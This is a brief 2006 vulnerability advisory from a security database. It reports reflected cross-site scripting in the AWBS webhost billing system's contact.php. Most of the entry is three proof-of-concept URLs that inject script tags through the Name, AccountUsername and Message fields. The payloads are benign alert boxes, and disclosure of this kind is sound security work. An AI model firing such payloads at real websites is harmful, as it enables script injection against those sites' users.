XSS vulnerability on AWBS

2006-08-02T00:00:00
ID SECURITYVULNS:DOC:13696
Type securityvulns
Reporter Securityvulns
Modified 2006-08-02T00:00:00

Description

AWBS=Advanced Webhost Billing System

Exploit;

1.)http://[site adres]/contact.php?action=submit&Name='><script>alert('XSS Vulnerability')%3B</script>&EmailAddress=1&AccountUsername=1&Message=1

2.)http://[site adres]/contact.php?action=submit&Name=1&EmailAddress=1&AccountUsername='><script>alert('XSS Vulnerability')%3B</script>&Message=1

3.)http://[site adres]/action=submit&Name=1&EmailAddress=1&AccountUsername=1&Message=</textarea><script>alert('XSS Vulnerability')%3B</script>

.newbinaryfile

newbinaryfile@gmail.com